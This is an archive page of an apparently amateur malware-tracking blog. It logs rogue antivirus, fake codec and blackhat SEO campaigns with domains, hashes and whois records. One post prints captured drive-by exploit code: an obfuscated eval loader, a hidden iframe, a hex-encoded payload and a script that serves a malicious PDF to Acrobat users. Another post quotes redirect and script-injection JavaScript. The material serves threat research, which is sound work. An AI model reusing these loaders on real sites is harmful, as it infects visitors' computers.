Blackhat SEO | Malware Database

Archive for the 'Blackhat SEO' Category

Aug

new rogue domain: makeptotect73.co.cc

By bartblaze 0 Comments

Categories: Blackhat SEO, Database Update and Rogue Security Software

If you’re looking for the latest news about Honda, you might get surprised by finding a rogueware called MySecuritySield popping up.

Some of the affected search terms:
honda recall 2010 list
honda recall 2010

Whois record for makeptotect73.co.cc

Registrant Contact:
Name: JONG SUNG, KIM
Address: 864-2, JANGHANGDONG, ILSAN
City: GOYANG,GYEOUNGGI
Country: South-Korea

hxxp://makeptotect73.co.cc
Result: 2/16 (13 %)
Domain Hash: 4546911ccc95e03d4290f0a5209c0077
URLVoid

The following file was dropped:
packupdate8_195.exe
Result: 7/39 (17.9%)
MD5: 64c63db4f9bb57a85120b822fbd4dfb0
VirusTotal
Anubis Report
ThreatExpert Report

Related domain:
hxxp://get-download41.co.cc

Screenshot examples:

Fake scan page Windows XP style

Fake scan page Windows 7 style

Jun

Introducing: Roguevertising

By bartblaze 3 Comments

Categories: Blackhat SEO, Database Update, Malware Distribution, Rogue Security Software and Rogue Software

Introducing: Roguevertising

A new term in the rogue industry – written by Bart Parys

Today I will be talking about a new trend that spreads itself quite quickly throughout the internet.
In this document I will try to explain what it is all about and provide additional information like screenshots and measures that can be taken to tackle these threats.

It all started when I found a new rogue domain:
hxxp://antispyware.com

Antispyware2010 website

The following domains are associated with Antispyware.com:
hxxp://antispyware2009.com
hxxp://Errorsmart.com
hxxp://Registryclear.com
hxxp://Remover.org

They all introduce the same ‘product’ – to perform a scan for malware on your computer. You can even request Live Technical Support.
(No, not really, it will just refer you to the download page)

When you download their product, you can find the following setup file in your chosen download folder:
setupxv

setupxv.exe

Pending on the website you landed on, you can also download another file called setup.exe

The file setupxv.exe has currently a 53.66% detection ratio on VirusTotal. The classification most used included the name Fakealert:
VirusTotal Result
It is also possible you download a file with the same name (setupxv.exe) but with slightly changed binaries. You can find an example of this on VirusTotal:
VirusTotal Result

For more information about this rogue program and the others described down below, I refer to the end of this document, where you can find some screenshots of my findings.

Then, after performing some Google searches on fake testimonials and information taken from their website , I landed on the following rogue domain:

hxxp://againstadware.com

AgainstAdware website

Unfortunately, you cannot download their product anymore, as the setup file has been removed.

The following domains are associated with Againstadware.com:

http://Fileboxx.com

http://Incredible-mail-download.com

http://Secureoneantivirus.com

http://Wincleanerpro.com

Now, why am I introducing the term roguevertising ?

You might have heard about malvertising. Malvertising (short for Malicious Advertising) is a term used for malicious advertisements that are clicked on, and can deliver a drive-by-download or suggesting to install a certain program to clean and scan your computer.

These days I have found a lot of websites using malvertising for rogue security software. That is how the term roguevertising was born.

A few examples of these websites:

hxxp://www.hopelinenc.org/forum/anti-spyware

hxxp://www.thedietsolutionprogram.ws/weblog/anti-spyware

hxxp://www.thedietsolutionprogram.ws/rating/anti-spyware

hxxp://www.perfectoptimizer5.com/?hop=aseafood

hxxp://www.bestspywareprogram.net
antispyware.com roguevertising
Along with legit Antispyware applications, you can find “Antispyware” between the list with … an advertisement leading to the download link of the rogue. (Done through an advertising mirror)

hxxp://threats.browsetag.com/antispyware
hxxp://www.plrarticlesoftware.biz/forum/anti-spyware
hxxp://www.earth4energyoffical.com/weblog/anti-spyware
hxxp://www.earth4energyoffical.com/article/adware-alert
hxxp://www.earth4energyoffical.com/article/privacy-control
hxxp://www.theaffiliatecode.ws/weblog/anti-spyware
hxxp://www.legitonlinejobshome.com/tags/anti-spyware

Additionally, I stumbled upon the following rogue domain:
hxxp://spywareremover.com
spywareremover.com website
SpywareRemover website

When you download their product, you can find the following setup file in your chosen download folder:
SpywareRemover icon
Setupxv.exe

That’s right. Setupxv all over again, but with a different icon and again changed binaries.

The file setupxv.exe has currently a 39.02% detection ratio on VirusTotal. The classification most used included the name AdSpy:
VirusTotal Result

Do you surf the internet ? Does your PC run slow ? Do you get bombarded with annoying pop-up ads ?
Then you are most likely to land on the following page:
Adware Alert homepage
AdwareAlert website

Yet again, setupxv is presented to you with a nice new icon:
AdwareAlert icon

Current VirusTotal detection rate is 48.78% . The file was again changed to avoid detections by Antivirus software. (also introduces another GUI as noted at the end of this document)
VirusTotal Result

The setupxv rogueware campaign is on a roll, down below some associated domains with AdwareAlert.com:

hxxp://Cbadvance.com
hxxp://Errorkiller.com
hxxp://Evidenceeraser.com
hxxp://Malwarebot.com
hxxp://Malwareremovalbot.com
hxxp://Registrybot.com
hxxp://Registrysmart.com
hxxp://Regrecall.com
hxxp://Regsweep.com
hxxp://Spywarebot.com
hxxp://Spywarestop.com

Next rogueware domain on our list is:
hxxp://www.antispywarebotpro.com
AntiSpywarebot homepage
AntiSpywareBot website

As always your download is free as well as the malicious payload:
asbot icon
Setupxv.exe

Current VirusTotal detection rate is 48.78% .
VirusTotal Result

Related domains in this case are:

hxxp://mail.remover.org
hxxp://www.privacycontrolpro.com
hxxp://errorsweeperpro.com
hxxp://Regcleanlite.com
hxxp://www.browsetag.com/spyware/virus/threats
hxxp://support.browsetag.com/certified/antispyware
hxxp://www.spywarenuker-gary.com/blog/anti-spyware
hxxp://www.spywarenuker-gary.com/blog/adware-alert

As you might have noticed, roguevertising is appearing on these last pages. Spywarenuker Gary needs to find another name, as his directory is filled with malicious advertisements and bloatware:
spywarenuker gary directory
Part of a roguevertising directory

I have also gathered the following URLs which are also related to the setupxv rogueware campain:

hxxp://adwarealert.com
hxxp://Cbadvance.com
hxxp://Errorkiller.com
hxxp://Evidenceeraser.com
hxxp://Malwarebot.com
hxxp://Malwareremovalbot.com
hxxp://Registrybot.com
hxxp://Registrysmart.com
hxxp://Regrecall.com
hxxp://Regsweep.com
hxxp://Spywarebot.com
hxxp://Spywareremover.com
hxxp://Spywarestop.com

One of the rogues download above, again setupxv:

Setupxv.exe

This new version of setupxv only has a 4.88% detection ratio on VirusTotal:
VirusTotal Result

… and delivers you the program RegClean

RegClean Setup Wizard

The following rogue that you might remember is Spyware Cease:

hxxp://www.spywarecease.com

SpywareCease website

SpywareCease comes in the following setup file:
spywarecease icon

It has currently a 12.20% ratio on VirusTotal:
VirusTotal Result

Associated domains and roguevertising links for Spywarecease.com:

hxxp://www.spycease.com
hxxp://www.micronichefinderhome.com/blog/spyware-cease
hxxp://entrepreneur.useoursite.com/go.php?p=SSPYKILLER
hxxp://offto.net/SpywareCease_4ee8
hxxp://viral-link-exchange.info/clickbank-supercenter/html/spyware-cease-1-converting-anti-spyware-software.htm
hxxp://www.cheapsale.org/html/spyware-cease-1-converting-anti-spyware-software.htm
hxxp://www.easyfixcomputersolutions.com/home.php
hxxp://www.easydigitalsales.com/33027/Spyware-Cease—1-Converting-Anti-Spyware-Software.html

We are moving on to the last roguevertising campaign, brought to you by 007 Anti-Spyware.
I stumbled upon this one while investigating the SpywareCease roguevertising campaign.
hxxp://www.007antispyware.com
Unfortunately (or luckily) this site was down at the time of writing, but I found a roguevertising domain for this one:
hxxp://007antyspyware.blogspot.com

007 Anti-Spyware website (blog)

The blog provides an ad-provided mirror for the setup file 007antipsyware.exe

007antipsyware.exe

The file has currently very low detection ratios on Virustotal. Only 4.88% of the scanners detect it,
namely as Adware.SpywareCease. Rings a bell somewhere…
VirusTotal Result

But the fun is not over yet. When visiting this roguevertiser’s Twitter page, you can install the Googod toolbar. Now we can add spyware on the list, since the Googod toolbar is copyrighted under
Conduit Ltd., which is renowned for its spyware activities. This toolbar is available for Internet Explorer, Mozilla Firefox and Safari.

hxxp://www.googod.ourtoolbar.com

Googod toolbar website

2.44% on VirusTotal
VirusTotal Result

Conclusion

Although malvertising is not a new concept, roguevertising however is.
I hope that throughout this document it became a bit clearer what it is all about and how only one rogueware campaign is and will be able to infect a lot of users.
No, the rogueware will not clean nor speed up your computer.

Pushing rogueware downloads through advertisements on weblogs, bloatware websites or even on Google, will be a phenomenon we have to deal with. In this case the setupxv rogueware campaign was able to spread itself through different domains, which can attract users to actually download and install the software.

But there might be hope.In my opinion can websites like Antispyware.com be prevented by ever seeing the light: register domains that can be used for roguevertising. In this case, the setupxv creators would not have been able to register this domain, and users would get a message stating the website is under construction, for example or it is registered for the single purpose of stopping websites like this.
Another option would be for the domain linking to an AntiVirus vendor, as described below.
After all, the site Antispyware.com website sounds legit, and when you visit the site, the user will not notice anything suspicious. For example Antivirus.com is registered to TrendMicro.
When you look up Antispyware.com however, you get a 32 % dangerous rating on URLVoid:
URLVoid Result

Tools like Web Of Trust (WOT) can prevent you from landing on sites like Antispyware.com.
Other manners to prevent this can either be hostfile-based or user-based.
Examples can be MVPS Hosts or Sandboxie. Common sense however will always be the most important factor, just remember the following rule: if it looks like a rogue, it probably is !
This does of course not imply that every suspicious looking program is malicious, rather perform some checks with your favorite search engine or use URLVoid and VirusTotal as a reference.

Further rogueware screenshots are provided down below. Thank you for reading.

007 Antispyware

Setup screen

Shortcut icon

Interface

Adware Alert

Setup screen

Shortcut icon

Interface

Antispyware 2008

Setup screen

Shortcut icon

Interface

007 Antispyware

Setup screen

Shortcut icon

Interface

May

New rogue domains under xorg.pl

By bartblaze 0 Comments

Categories: Blackhat SEO, Database Update and Rogue Security Software

You might have heard that Brian Vickers of Red Bull Racings was shifted to hospital last week due to some unknown reasons.
This week, you can still be redirected to malicious domains and bump into a rogueware. These are all hosted under XOrg.pl, known for malicious activities.

Whois record for XOrg.pl

Registrant Contact:
Name: NetArt Spolka Akcyjna S.K.A.
Phone: +48.801 33 22 33
Address: Rondo Mogilskie 1
City: 31-516 Krakow
Country: Poland

packupdate_build107_2045.exe
Result: 16/41 (39.02%)
MD5: 9d44165fa043a2f9674055055233598e
VirusTotal
Anubis Report
ThreatExpert Report
Fake Scanner Pages: (Note: some might still be active, so be careful)
hxxp://www1.checker26-pd.xorg.pl
hxxp://www1.savepc20-pd.xorg.pl
hxxp://www1.bestfastclean-31p.xorg.pl
hxxp://www2.allmostclean-38pd.xorg.pl
hxxp://www2.allmostclean-29pd.xorg.pl
hxxp://www1.fastcleanup-46p.xorg.pl

This rogue is called “My Security Engine“.

Some screenshot examples:

The Fake Scanner Page

Another Fake Scanner Page
Mind I was using XP, but still received the Vista look

When executing the dropped file ( packupdate_build107_2045.exe ):

Setup of the Rogue Program

Apr

new rogue domain: safetypcwork4.com

By bartblaze 0 Comments

Categories: Blackhat SEO, Database Update and Rogue Security Software

Today, I was browsing Google for the recent False Positive from McAfee. Blackhat SEO has been targeting the keywords for this subject. Some related keywords are: McAfee, wecorl, patch, DAT5958
Suddenly, I got redirected to a fake scanner page.

Whois record for safetypcwork4.com

Registrant Contact:
Name: Garritt Kooken
Phone: +86.592257788 fax: +86.592257788
Address: Rue de Virton 237
City: Evegnee 4631
Country: Belgium

packupdate_build107_287.exe
Result: 8/40 (20.00%)
MD5: 9d44165fa043a2f9674055055233598e
VirusTotal
Anubis Report
ThreatExpert Report
Fake Scanner Page: hxxp://www2.safetypcwork4.com

This rogue is called “Windows Performance Center“.

Some screenshot examples:

The Fake Scanner Page

When executing the dropped file ( packupdate_build107_287.exe ):

Setup of the Rogue Program

Jul

Blackhat SEO campaign with domains flooding search results-UPDATED

By djpnuemo 0 Comments

Categories: Blackhat SEO, Malicious Domains, Malware Distribution and Rogue Security Software

There is a blackhat seo campaign that is redirecting users to fake scanning websites to infect users. Each of these domains has many pages filled with keywords to get high rankings on search pages. Once clicked, the user is redirected to the drive-by download site of the day. You can click on each domain name to view the whois information. Here is a list of some of the domains as well as how it works.

<script type=”text/javascript” src=”/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoV
Cp_qCODoee2QvAwsxetjrz1uKFNY2brg”></script>

The following javascript is then loaded…

var t3dbj5es5;if (typeof(encodeURIComponent) == ‘function’) t3dbj5es5 = encodeURIComponent;else if (typeof(escape) == ‘function’) t3dbj5es5 = escape;else t3dbj5es5 = function (text) { return text; };document.write(‘<script src=”http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=’ + (document.referrer ? t3dbj5es5(document.referrer) : ”) + ‘” type=”text/javascript”></script>’);

The contents of the new page is below.

document.location.href=’http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1′;

Redirects to
hxxp://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1
Redirects to
Fake scanning page of the day as selected by malware distributers.

ufumtrwz.com 208.73.210.26
rmeged.com 208.87.149.250
stqbcfkjp.com 69.64.147.209
vhwdhjfig.com 69.64.147.210
pazjbw.com 69.64.147.210
rklktu.com 69.64.147.211
nbzqkp.com 69.64.147.212
wqtlto.com 69.64.147.212
klqltr.com 69.64.147.212
obirrd.com 69.64.147.212
qylzioqty.com 69.64.147.213
brohpql.com 69.64.147.214
atoonoyxm.com 69.64.147.215
ilmtvne.com 69.64.147.215
udtlgrzm.com 69.64.147.216
tnkpghmt.com 69.64.147.217
lpstjr.com 69.64.147.217
auvwbkdbe.com 69.64.147.217
colixfpf.com 69.64.155.120
qtltmzq.com 69.64.155.120
tgshpj.com 69.64.155.121
mkutvrah.com 69.64.155.121
nzadvyul.com 69.64.155.121
dvgbuqyg.com 69.64.155.121
nsqaidn.com 69.64.155.122
sambmq.com 69.64.155.122
sgkoqblfp.com 69.64.155.122
gxprzo.com 69.64.155.123
ujqqccmvd.com 69.64.155.124
dhmhcze.com 69.64.155.124
xarhwsvf.com 69.64.155.125
fitvahmz.com 69.64.155.126
vqtxnqmre.com 69.64.155.127
buzstyltd.com 69.64.155.127

UPDATED: 7/5/09

tvciucde.com 174.129.244.106 174.129.241.185
jmguhkxaj.com 194.110.162.82
nhroiv.com 194.110.162.83
gyadqcuoc.com 194.110.162.85
igvutelu.com 194.110.162.86
nqcngszq.com 194.110.162.86
birkkane.com 194.110.162.86
ouvthweg.com 194.110.162.89
vwsevihm.com 194.110.162.94
gakvgp.com 194.110.162.95
onnrdm.com 194.110.162.227

Jun

Adobe exploit page installs malware updatedb87.cn & nicevideo15.com

By djpnuemo 0 Comments

Categories: Blackhat SEO, Database Update, Infection, Malicious Domains, Malicious Links, Malware and Malware Distribution

This domain is exploiting vulnerabilities in Adobe to help with the installation of malware to a victims computer. This exploit is done quietly and the user is none the wiser. The exploit is triggered from a search referrer.

WARNING: URL’s may still be active. VERY DANGEROUS. Proceed at your own risk.

hxxp://updatedb87.cn/out/index.php

function load(code,dfunc,anticasp)
{
eval(dfunc);
decrypt(code);
}
load(‘<`B15ni[B15niAS1(i1I"u"[Xh1Soo`YlI"YS"[g`(QZI"m"[Zi`lZQI"m"[X1hI"ZQQFx
;;\'F(5Qi(~8/.hY;S\'Q;`Y(i9.FZF"><;`B15ni>‘,unescape(‘function decrypt%28n%29
%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb
%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md
%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29
%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind
%3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write
%28q%29%7D’));

Deobfuscates to

<iframe frameBorder=”0″ scrolling=”no” width=”1″ height=”1″ src=”http://updatedb87.cn/out/index.php”></iframe>

This iframe contains the following code that will use a malicious pdf file to instal malware to the system.

<script>vubqza=”6e7d666b7c616766286d625c314a4069392021737e697a286c7b
715e7d51523d502835286c676b7d656d667c266b7a6d697c6d4d646d656d667c202f
67486a4862486d48486b487c48482f267a6d7864696b6d20274827616f24282f2f21
21336c7b715e7d51523d50267b6d7c497c7c7a616a7d7c6d202f6148486c48482f26
7a6d7864696b6d20274827616f24282f2f21246c7b715e7d51523d5021336c7b715e
7d51523d50267b6d7c497c7c7a616a7d7c6d202f6b4864484869487b48487b486148
6c482f267a6d7864696b6d20274827616f24282f2f21242f6b484864487b48486148
6c4832484a48484c484831483e484b483d48483d48483e4825483e483d4849483b48
2548394839484c4838482548314830483b4848494848254838483848484b48384848
3c484e484b483a4831484d48483b48483e482f267a6d7864696b6d20274827616f24
282f2f2121337c7a71737e697a286b4f795a4b674f5c6b3f2835286c7b715e7d5152
3d50264b7a6d697c6d476a626d6b7c202f65487b4870486548486448483a48264850
48484548444840485c485c48485848482f267a6d7864696b6d20274827616f24282f
2f21242f2f21337e697a2869707b4c3f5c6d5a7f2835286c7b715e7d51523d50264b
7a6d697c6d476a626d6b7c202f5b48486048486d4864486448482648494848784878
484864484861486b48486948487c486148674866482f267a6d7864696b6d20274827
616f24282f2f21242f2f21337e697a286358436e433e4b46422835286c7b715e7d51
523d50264b7a6d697c6d476a626d6b7c202f6948486c484867486c486a4826487b48
7c487a486d484869486548482f267a6d7864696b6d20274827616f24282f2f21242f
2f21337c7a71736358436e433e4b4642267c71786d28352839336b4f795a4b674f5c
6b3f2667786d66202f4f484d485c482f267a6d7864696b6d20274827616f24282f2f
21242f6048487c487c4848784848324848274827487d487848486c48486948487c48
486d48486c48486a4830483f482648486b48486648482748486748487d487c484827
484864486748486948486c48264848784848604848784848374861486c4848354848
3848482f267a6d7864696b6d20274827616f24282f2f21246e69647b6d21336b4f79
5a4b674f5c6b3f267b6d666c2021336358436e433e4b46422667786d662021336358
436e433e4b4642265f7a617c6d206b4f795a4b674f5c6b3f267a6d7b7867667b6d4a
676c7121337e697a286a5e39714f516339422835282f264848274827482648264827
4827487d484878486c48486948487c48486d4826486d487048486d482f267a6d7864
696b6d20274827616f24282f2f21336358436e433e4b4642265b697e6d5c674e6164
6d206a5e39714f51633942243a21336358436e433e4b4642264b64677b6d20213375
6b697c6b60206d212873757c7a717369707b4c3f5c6d5a7f267b606d64646d706d6b
7d7c6d206a5e39714f516339422133756b697c6b60206d21287375756b697c6b6020
6d21287375756d625c314a4069392021336e7d666b7c616766287952457e7d616966
442021736e677a2071493e4d3b3e3a613a2835283a24286652694243417264283528
2a2a332871493e4d3b3e3a613a283435283a3e332871493e4d3b3e3a613a23232173
66526942434172642835285b7c7a61666f266e7a67654b60697a4b676c6d203e3d28
232871493e4d3b3e3a613a21337e697a287c71435f786a4d61283528666d7f284165
696f6d2021337c71435f786a4d61267b7a6b2835282a7a6d7b3227272a2823286652
6942434172642823282a3254542a2823282f5848487a486748486f48487a48694865
482848484e486148486448486d487b48482f267a6d7864696b6d20274827616f2428
2f2f212823282a54542a2823282f47487d487c484864484867484867484863482848
4d4870487848487a48486d48487b48487b48482f267a6d7864696b6d20274827616f
24282f2f212823282a54542a2823282f6548487b4867486d48487a486d48487b4848
26486c4848644864482f267a6d7864696b6d20274827616f24282f2f212823282a27
2b3a27392a33616e207c71435f786a4d6126606d616f607c283535283d3121736a7a
6d696333757c71435f786a4d612835282f2f33757a6d7c7d7a662866526942434172
6433756e7d666b7c616766287b696c5e5d3e5d4a7e207d7a6421737e697a28665269
42434172642835287952457e7d61696644202133616e282066526942434172642835
35282f532f21287a6d7c7d7a66337c7a71737e697a28794d5b707a3d3f476a283528
666d7f28496b7c617e6d50476a626d6b7c202f7b484866484878487e487f4826485b
486648694878487b48486048486748487c484828485e4861486d48487f486d48487a
48482848484b48674866487c487a4848674864484826484839482f267a6d7864696b
6d20274827616f24282f2f212133756b697c6b60206d2173616e2820794d5b707a3d
3f476a282935282f5348486748486a48486248486d486b48487c485548482f267a6d
7864696b6d20274827616f24282f2f2121287a6d7c7d7a663375794d5b707a3d3f47
6a265b6669787b60677c58697c602835287d7a64337c7a7173794d5b707a3d3f476a
264b6765787a6d7b7b6d6c58697c6028352866526942434172642823282a3254542a
2823282f58487a486748486f487a4848694865484828484e484861486448486d487b
48482f267a6d7864696b6d20274827616f24282f2f212823282a54542a2823282f47
48487d48487c484864484867484867484863482848484d48487048487848487a486d
48487b48487b482f267a6d7864696b6d20274827616f24282f2f212823282a54542a
2823282f7f48486948486a48482648486d487048486d482f267a6d7864696b6d2027
4827616f24282f2f2133794d5b707a3d3f476a26587a61667c5b6669787b60677c20
2133756b697c6b60206d217375337e697a2878696c387b4e66632835287b6d7c4166
7c6d7a7e6964206e7d666b7c616766202173616e2820794d5b707a3d3f476a267a6d
696c715b7c697c6d283535283c2128736b646d697a41667c6d7a7e69642078696c38
7b4e666321337f61666c677f2664676b697c6167662835282f6448486c4848694848
7848483248274827482f267a6d7864696b6d20274827616f24282f2f213375752428
3b3838382133757b696c5e5d3e5d4a7e202f60487c487c4878484832482748274848
7d487848486c4869487c486d48486c486a484830483f4826486b4848664848274848
67487d487c482748486448674869486c4848264878486048784837486148486c4848
3548483948482f267a6d7864696b6d20274827616f24282f2f21213365676f352a46
69462a336f6f352a4669462a33″;jwgakx=”function rbyr(){gp=Math.PI;bhx=
parseInt;ffv=’length’;mvr=bhx(~((gp&gp)|(~gp&gp)&(gp&~gp)|(~gp&~gp)));
ybagye=bhx(((mvr&mvr)|(~mvr&mvr)&(mvr&~mvr)|(~mvr&~mvr))&1);nlwj=
ybagye< +'Code');mxeugy=eval;for(snr=mvr;snr jwgakx.charCodeAt(snr);gg%=unescape(mvr+unescape(''+'%7'+'8'+'')+(1<<6))
;for(snr=mvr;snr ('%78')+vubqza.charAt(snr)+vubqza.charAt(snr+bhx(ybagye)))^gg);try
{mxeugy(mog);}catch(e){try{eval(mog);}catch(e) {window.location='/';}
}}try{eval('rbyr();')}catch(e) {alert('err');}";eval(jwgakx);</script>
<script>
function pdf_gen2()
{
var detectAcrobat = false;
try
{
if( navigator.plugins && navigator.mimeTypes.length)
{
for( var i = 0; i < navigator.plugins.length; i++)
{
var name = navigator.plugins[i].name;
if( name.indexOf('Adobe Acrobat') != -1)
{
detectAcrobat = true;
break;
}
}
}
else
{
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if( !obj) obj = new ActiveXObject("PDF.PdfCtrl");
if( obj) detectAcrobat = true;
}
}
catch(e)
{
}
if( detectAcrobat)
{
document.write('<iframe src="pdf.php"></iframe>');
}
else return false;
}
pdf_gen2();
</script>

All have been added to our database.

update.exe
Result: 17/41 (41.47%)
MD5: bcb016582e40e6312f7bf742c0dfcedd
VirusTotal
ThreatExpert Analysis
hxxp://updatedb87.cn/out/load.php?id=0

pdrv.exe or stron_1245063771.exe
Result: 6/41 (14.64%)
MD5: ca557e7460c222ef90e9d36881f6ac53
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

update_936.pdf
Result: 6/41 (14.64%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
Wepawet Analysis
hxxp://updatedb87.cn/out/pdf.php

pp.10.exe
Result: 15/41 (36.59%)
MD5: d23ad273d30ad73edfac5afddf5e6550
VirusTotal
ThreatExpert Analysis
hxxp://61.235.117.71/files/

The page will also lead the user to a website that says the victim needs to install AdobeViewer and starts a download.

Whois entry for nicevideo15.com 94.232.248.70
Konstantin Berdeev
Email: camelot1984@gmail.com
Organization: Private person
Address: Moskva, m. Leninskoe, d. 192
City: Moskva
State: Moskvoskaya
ZIP: 174633
Country: RU
Phone: +7.4953996729
Fax: +7.49599672913

*.nicevideo44.com
*.pornotvnetwork.us
*.videofx4you2.com
*.videogtx4you2.com
nicevideo44.com
ns1.videofx4you2.com
ns1.videogtx4you2.com
ns2.nicevideo44.com
ns2.pornotvnetwork.us
ns2.videofx4you2.com
ns2.videogtx4you2.com
pornotvnetwork.us
videofx4you2.com
videogtx4you2.com

Setup.exe
Result: 10/41 (24.4%)
MD5: 5a96297e851288426cfa96022d0c822d
VirusTotal
ThreatExpert Analysis
hxxp://nicevideo15.com/software/f75b610c1c/14250/1/

Jun

New codec domains: exe-file-boom.com & hi-my-tube.com

By djpnuemo 0 Comments

Categories: Blackhat SEO, Codec, Database Update, Malicious Domains, Malware and Rogue Security Software

Found these domains spreading a fake codec today. Bother were registered today.

Whois entry for exe-file-boom.com 66.197.171.6
Isaac Donnelly (isaacdonn@gmail.com)
3711 Eastland Avenue
Hattiesburg
Mississippi,39402
US
Tel. +001.88795890983

exe-file-boom.com
my-exe-profile.com
web-exe-depositary.com
mp3downloadablesongs.com

Whois entry for hi-my-tube.com 216.240.143.7
Stephine Smith (stsmisss@gmail.com)
2810 Kovar Road
Westboro
Maine,01581
US
Tel. +001.76778989543

*.best-crystal-tube.com
*.big-tube-list.com
*.champtube2009.com
*.chipeztube2009.com
*.get-mega-tube.com
*.happy-tube-video.com
*.my-flare-tube.com
*.my-tube-zone.com
*.powerful-tube.com
*.tubecollection2009.com
*.video-tube-dot.com
*.wondertubes2009.com
better-tube-show.com
big-tube-list.com
fllcorp.com
get-mega-tube.com
megacooltubes2009.com
ns2.best-crystal-tube.com
ns2.big-tube-list.com
ns2.champtube2009.com
ns2.chipeztube2009.com
ns2.get-mega-tube.com
ns2.happy-tube-video.com
ns2.megaporntubes09.com
ns2.my-flare-tube.com
ns2.my-tube-zone.com
ns2.powerful-tube.com
ns2.tall-tubex.com
ns2.tube-xxx-tv2009.com
ns2.tubecollection2009.com
ns2.video-tube-dot.com
ns2.wondertubes2009.com
premier-tube-site.com
sunny-tube-house.com
www.best-crystal-tube.com
www.big-tube-list.com
www.champtube2009.com
www.chipeztube2009.com
www.get-mega-tube.com
www.my-tube-zone.com

streamviewer.40014.exe
Result: 9/40 (22.5%)
MD5: 78a3631fbc7d93ce07c33233416a2176
VirusTotal
ThreatExpert Analysis
hxxp://exe-file-boom.com/streamviewer.40014.exe

a.exe
Result: 11/39 (28.21%)
MD5: 2e326fd4048bdf28308a9bb5ced08ed7
VirusTotal
ThreatExpert Analysis
hxxp://thenewpic.com/item/a5acc232141aba8b24603e1b24eb084d0e020a6c16c76e38e6582142a6c4df427ca48b89cc4e0cf0a/4400d031142/titem.gif

b.exe or msa.exe
Result: 5/39 (12.83%)
MD5: c665052347ce07a9626c6cdcdb0e56d8
VirusTotal
ThreatExpert Analysis
hxxp://theimagesphoto.com/werber/04d04071f42/217.gif

Jun

New rogue domain: ourbestsecurityshield.com

By djpnuemo 0 Comments

Categories: Blackhat SEO, Database Update, Malicious Domains, Malware and Rogue Security Software

New rogue domain found today.

Whois entry for ourbestsecurityshield.com 209.44.126.241
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

securexdetect.com
securityfastscan.com
securityuniqscan.com
sidewebvirusscan.com
souptotalsecurity.com
thetrueshiledsecurity.com
todaysecuritytop.com
totalvirusshield.com
uniqtrustedweb.com
uniqviruscleaner.com
virusdestroyerboost.com
www.allowedwebsurfing.com
www.bestwebscantools.com
www.fullsecurityaction.com
www.fullvirusprotection.com
www.hupersecuritydot.com
www.intellectsecurityshield.com
www.truevirusshield.com
www.uniqviruscleaner.com
xvirusdescan.com

install.exe (System Security 2009)
Result: 12/40 (30%)
MD5: bfb22174402c3123915a8bb7b019aba1
VirusTotal
ThreatExpert Analysis
hxxp://ourbestsecurityshield.com/download.php?affid=08045

SANDBOX

SANDBOX ANALYSIS PAGE

Malware Database

Archive for the 'Blackhat SEO' Category

new rogue domain: makeptotect73.co.cc

Introducing: Roguevertising

New rogue domains under xorg.pl

new rogue domain: safetypcwork4.com

Blackhat SEO campaign with domains flooding search results-UPDATED

Adobe exploit page installs malware updatedb87.cn & nicevideo15.com

New codec domains: exe-file-boom.com & hi-my-tube.com

New rogue domain: ourbestsecurityshield.com

Search

Recent Posts

Categories

Archives

Blogroll